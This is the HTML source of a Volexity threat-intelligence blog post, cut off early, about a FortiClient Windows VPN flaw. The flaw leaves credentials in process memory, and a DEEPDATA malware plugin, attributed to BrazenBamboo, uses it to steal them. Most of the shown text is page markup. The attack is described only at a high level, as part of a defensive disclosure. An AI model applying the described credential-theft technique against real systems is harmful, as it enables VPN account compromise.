<!DOCTYPE html> <!--[if lt IE 7 ]> <html lang="en-US" class="ie ie6 lte9 lte8 lte7 lte6 no-js"> <![endif]--> <!--[if IE 7 ]> <html lang="en-US" class="ie ie7 lte9 lte8 lte7 no-js"> <![endif]--> <!--[if IE 8 ]> <html lang="en-US" class="ie ie8 lte9 lte8 no-js"> <![endif]--> <!--[if IE 9 ]> <html lang="en-US" class="ie ie9 lte9 no-js"> <![endif]--> <!--[if (gt IE 9)|!(IE)]><!--> <html lang="en-US" class="no-js"> <!--<![endif]--> <meta charset="UTF-8"> <title>BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA | Volexity</title> <meta name="HandheldFriendly" content="True"> <meta name="MobileOptimized" content="320"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="cleartype" content="on"> <meta name="twitter:card" content="summary_large_image"> <meta name="twitter:site" content="@Volexity"> <meta name="twitter:creator" content="@Volexity"> <meta name="twitter:title" content="BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA"> <meta name="twitter:description" content="[Update: At the time of publication, this vulnerability had not been addressed by Fortinet. On December 18, 2024, Fortinet published a public acknowledgement of the issue, affected versions, as well as patching &amp; workaround advice.] KEY TAKEAWAYS Volexity discovered and reported a vulnerability in Fortinet&#039;s Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN. This vulnerability was abused by BrazenBamboo in their DEEPDATA malware. BrazenBamboo is the threat actor behind development of the LIGHTSPY malware family. LIGHTSPY variants have been discovered for all major operating systems, including iOS, and Volexity has recently discovered a new Windows variant. 
In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. [&hellip;]"> <meta name="twitter:image" content="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png"> <link rel="apple-touch-icon" sizes="180x180" href="https://www.volexity.com/wp-content/themes/volexity/apple-touch-icon.png"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon-32x32.png" sizes="32x32"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon-16x16.png" sizes="16x16"> <link rel="icon" type="image/png" href="https://www.volexity.com/wp-content/themes/volexity/favicon.ico"> <link rel="manifest" href="https://www.volexity.com/wp-content/themes/volexity/manifest.json"> <meta name="theme-color" content="#12BEF0"> <meta property="og:image" content="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-300x157.png" /> <!-- Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-WRSX85NK29"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-WRSX85NK29'); </script> <meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /> <!-- This site is optimized with the Yoast SEO Premium plugin v22.5 (Yoast SEO v23.8) - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in 
Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability. At the time of writing, the issue remains unresolved." /> <link rel="canonical" href="https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA" /> <meta property="og:description" content="In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability. At the time of writing, the issue remains unresolved." 
/> <meta property="og:url" content="https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/" /> <meta property="og:site_name" content="Volexity" /> <meta property="article:publisher" content="https://www.facebook.com/volexity/" /> <meta property="article:published_time" content="2024-11-15T19:50:18+00:00" /> <meta property="article:modified_time" content="2024-12-19T14:42:00+00:00" /> <meta property="og:image" content="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png" /> <meta property="og:image:width" content="2061" /> <meta property="og:image:height" content="1078" /> <meta property="og:image:type" content="image/png" /> <meta name="author" content="Volexity" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Article","@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#article","isPartOf":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/"},"author":{"name":"Volexity","@id":"https://www.volexity.com/#/schema/person/3159370c7fbbe719c11e41aeb6353ae1"},"headline":"BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via 
DEEPDATA","datePublished":"2024-11-15T19:50:18+00:00","dateModified":"2024-12-19T14:42:00+00:00","mainEntityOfPage":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/"},"wordCount":2988,"publisher":{"@id":"https://www.volexity.com/#organization"},"image":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#primaryimage"},"thumbnailUrl":"https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png","keywords":["APT","brazenbamboo","China","exploits","forticlient","Fortinet","Threat Intelligence"],"articleSection":["Threat Intelligence"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/","url":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/","name":"BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA | Volexity","isPartOf":{"@id":"https://www.volexity.com/#website"},"primaryImageOfPage":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#primaryimage"},"image":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#primaryimage"},"thumbnailUrl":"https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png","datePublished":"2024-11-15T19:50:18+00:00","dateModified":"2024-12-19T14:42:00+00:00","description":"In July 2024, Volexity identified exploitation of a zero-day credential disclosure vulnerability 
in Fortinet’s Windows VPN client that allowed credentials to be stolen from the memory of the client’s process. This vulnerability was discovered while analyzing a recent sample of the DEEPDATA malware family. DEEPDATA is a modular post-exploitation tool for the Windows operating system that is used to gather a wide range of information from target devices. Analysis of the sample revealed a plugin that was designed to extract credentials from FortiClient VPN client process memory. On July 18, 2024, Volexity notified Fortinet about this vulnerability. At the time of writing, the issue remains unresolved.","breadcrumb":{"@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#primaryimage","url":"https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png","contentUrl":"https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png","width":2061,"height":1078,"caption":"Volexity Blog - BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via 
DEEPDATA"},{"@type":"BreadcrumbList","@id":"https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.volexity.com/"},{"@type":"ListItem","position":2,"name":"Blog","item":"https://www.volexity.com/blog/"},{"@type":"ListItem","position":3,"name":"BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA"}]},{"@type":"WebSite","@id":"https://www.volexity.com/#website","url":"https://www.volexity.com/","name":"Volexity | Memory Forensics, Cybersecurity Threat Intelligence & Incident Response","description":"","publisher":{"@id":"https://www.volexity.com/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.volexity.com/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https://www.volexity.com/#organization","name":"Volexity Inc.","alternateName":"Volexity - Forensic Memory Analysis","url":"https://www.volexity.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/#/schema/logo/image/","url":"https://www.volexity.com/wp-content/uploads/2018/01/Volexity-Logo-Full-Stacked-2019-1000px.jpg","contentUrl":"https://www.volexity.com/wp-content/uploads/2018/01/Volexity-Logo-Full-Stacked-2019-1000px.jpg","width":1000,"height":1000,"caption":"Volexity 
Inc."},"image":{"@id":"https://www.volexity.com/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/volexity/","https://x.com/Volexity","https://www.linkedin.com/company/volexity/","https://github.com/volexity","https://infosec.exchange/@volexity"]},{"@type":"Person","@id":"https://www.volexity.com/#/schema/person/3159370c7fbbe719c11e41aeb6353ae1","name":"Volexity","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://www.volexity.com/#/schema/person/image/","url":"https://secure.gravatar.com/avatar/757082c7e4105ce43a92a48f14f581c2?s=96&d=mm&r=g","contentUrl":"https://secure.gravatar.com/avatar/757082c7e4105ce43a92a48f14f581c2?s=96&d=mm&r=g","caption":"Volexity"}}]}</script> <!-- / Yoast SEO Premium plugin. --> <link rel='stylesheet' id='wp-block-library-css' href='https://www.volexity.com/wp-includes/css/dist/block-library/style.min.css?ver=6.7' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: 
#00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 
2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: 
var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) 
!important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) 
!important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='cookie-notice-front-css' href='https://www.volexity.com/wp-content/plugins/cookie-notice/css/front.min.css?ver=2.4.18' type='text/css' media='all' /> <link rel='stylesheet' id='main-style-css' href='https://www.volexity.com/wp-content/themes/volexity/dist/styles/styles.min.css?ver=6.7' type='text/css' media='screen, print' /> <script type="text/javascript" id="cookie-notice-front-js-before"> /* <![CDATA[ */ var cnArgs = {"ajaxUrl":"https:\/\/www.volexity.com\/wp-admin\/admin-ajax.php","nonce":"4459d1fad1","hideEffect":"fade","position":"bottom","onScroll":false,"onScrollOffset":100,"onClick":false,"cookieName":"cookie_notice_accepted","cookieTime":2592000,"cookieTimeRejected":2592000,"globalCookie":false,"redirection":false,"cache":false,"revokeCookies":false,"revokeCookiesOpt":"automatic"}; /* ]]> */ </script> <script type="text/javascript" src="https://www.volexity.com/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.4.18" id="cookie-notice-front-js"></script> <script type="text/javascript" src="https://www.volexity.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script type="text/javascript" src="https://www.volexity.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <link rel="https://api.w.org/" href="https://www.volexity.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" 
href="https://www.volexity.com/wp-json/wp/v2/posts/3346" /><link rel='shortlink' href='https://www.volexity.com/?p=3346' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://www.volexity.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.volexity.com%2Fblog%2F2024%2F11%2F15%2Fbrazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://www.volexity.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.volexity.com%2Fblog%2F2024%2F11%2F15%2Fbrazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata%2F&#038;format=xml" /> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ </style> <!--[if lte IE 9 ]> <script src="https://www.volexity.com/wp-content/themes/volexity/scripts/vendor/selectivizr.js"></script> <script src="https://www.volexity.com/wp-content/themes/volexity/scripts/vendor/respond.js"></script> <script src="https://www.volexity.com/wp-content/themes/volexity/scripts/vendor/mediamatch.js"></script> <![endif]--> </head> <body class="post-template-default single single-post postid-3346 single-format-standard cookies-not-set ie ie7 windows"> <header class="header"> <div class="header-top-container"> <div class="container"> <ul id="menu-sub-left" class="header-sub-left"><li id="menu-item-2116" class="icon-triangle menu-item menu-item-type-post_type menu-item-object-page menu-item-2116"><a href="https://www.volexity.com/company/contact/demo-request/" class="icon-triangle">Request A Demo</a></li> </ul> <ul id="menu-sub-right" class="header-sub-right"><li id="menu-item-1213" class="icon-warning menu-item menu-item-type-post_type menu-item-object-page menu-item-1213"><a href="https://www.volexity.com/company/contact/breach-assistance/" class="icon-warning">Breach Assistance</a></li> </ul> </div> </div> <div 
class="header-container"> <div class="container"> <a class="header-logo" href="https://www.volexity.com"><img src="https://www.volexity.com/wp-content/themes/volexity/dist/images/logo.png" alt="Volexity"></a> <div class="header-menu"> <ul id="menu-main-navigation" class="header-menu-list"><li id="menu-item-376" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-376"><a href="https://www.volexity.com/products-overview/">Products</a> <ul class="sub-menu"> <li id="menu-item-48" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-48"><a href="https://www.volexity.com/products-overview/">Products Overview</a></li> <li id="menu-item-50" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50"><a href="https://www.volexity.com/products-overview/volcano/">Volcano</a></li> <li id="menu-item-49" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-49"><a href="https://www.volexity.com/products-overview/surge/">Surge</a></li> </ul> </li> <li id="menu-item-377" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-377"><a href="https://www.volexity.com/services-overview/">Services</a> <ul class="sub-menu"> <li id="menu-item-55" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55"><a href="https://www.volexity.com/services-overview/">Services Overview</a></li> <li id="menu-item-52" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-52"><a href="https://www.volexity.com/services-overview/incident-response/">Incident Response</a></li> <li id="menu-item-53" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-53"><a href="https://www.volexity.com/services-overview/network-security-monitoring/">Network Security Monitoring</a></li> <li id="menu-item-54" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54"><a 
href="https://www.volexity.com/services-overview/proactive-threat-assessments/">Proactive Threat Assessments</a></li> <li id="menu-item-56" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56"><a href="https://www.volexity.com/services-overview/threat-intelligence/">Threat Intelligence</a></li> <li id="menu-item-2394" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2394"><a href="https://www.volexity.com/services-overview/mergers-acquisitions-cybersecurity-assessments/">M&#038;A Cybersecurity Assessments</a></li> </ul> </li> <li id="menu-item-385" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-385"><a href="https://www.volexity.com/company/about/">Company</a> <ul class="sub-menu"> <li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="https://www.volexity.com/company/about/">About</a></li> <li id="menu-item-43" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43"><a href="https://www.volexity.com/company/news-press/">News &#038; Press</a></li> <li id="menu-item-1849" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1849"><a href="https://www.volexity.com/company/careers/">Careers</a></li> <li id="menu-item-1824" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1824"><a href="https://www.volexity.com/company/internships/">Internships</a></li> <li id="menu-item-1718" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1718"><a href="https://www.volexity.com/company/resources/">Resources</a></li> </ul> </li> <li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-39"><a href="https://www.volexity.com/blog/">Blog</a></li> <li id="menu-item-45" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-45"><a 
href="https://www.volexity.com/company/contact/">Contact</a></li> </ul> </div> <div class="mobile-menu--holder"> <div class="mobile-menu"></div> </div> </div> </div> </header> <main class="main"> <div class="container"> <section class="row int"> <article class="col-sm-8"> <div class="post-content composition"> <h2 class="post-title">BrazenBamboo Weaponizes FortiClient Vulnerability to Steal VPN Credentials via DEEPDATA</h2> <p class="post-date">November 15, 2024</p> <p class="post-byline">by Callum Roxan, Charlie Gardner, Paul Rascagneres</p> <p><img fetchpriority="high" decoding="async" class="aligncenter size-full wp-image-3349" src="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png" alt="" width="2061" height="1078" srcset="https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA.png 2061w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-300x157.png 300w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-1024x536.png 1024w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-768x402.png 768w, 
https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-1536x803.png 1536w, https://www.volexity.com/wp-content/uploads/2024/11/Volexity-Blog-BrazenBamboo-Weaponizes-FortiClient-Vulnerability-to-Steal-VPN-Credentials-via-DEEPDATA-2048x1071.png 2048w" sizes="(max-width: 2061px) 100vw, 2061px" /></p> <p><em>[Update: At the time of publication, this vulnerability had not been addressed by Fortinet. On December 18, 2024, <a href="https://fortiguard.fortinet.com/psirt/FG-IR-23-278">Fortinet published a public acknowledgement</a> of the issue, affected versions, as well as patching &amp; workaround advice.]</em></p> <hr /> <h5><span style="color: #4e9dd6;">KEY TAKEAWAYS</span></h5> <ul style="font-weight: 400;"> <li><em>Volexity discovered and reported a vulnerability in Fortinet's Windows VPN client, FortiClient, where user credentials remain in process memory after a user authenticates to the VPN.</em></li> <li><em>This vulnerability was abused by BrazenBamboo in their DEEPDATA 